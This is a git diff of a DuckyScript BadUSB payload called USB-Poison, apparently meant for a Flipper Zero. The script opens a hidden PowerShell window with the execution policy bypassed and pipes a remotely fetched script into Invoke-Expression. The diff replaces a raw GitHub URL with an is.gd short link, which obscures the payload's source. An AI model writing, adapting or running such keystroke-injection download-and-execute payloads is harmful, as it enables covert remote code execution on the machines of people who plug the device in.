diff --git a/USB-Poison/USB-Poison.txt b/USB-Poison/USB-Poison.txt index 78b6f54..c57ac92 100644 --- a/USB-Poison/USB-Poison.txt +++ b/USB-Poison/USB-Poison.txt @@ -11,6 +11,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $url = 'YOUR_FILE_URL_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Record-Screen-GUI/main.ps1 | iex +STRING powershell -NoP -Ep Bypass -W H -C $url = 'YOUR_FILE_URL_HERE'; irm is.gd/usbpoison | iex ENTER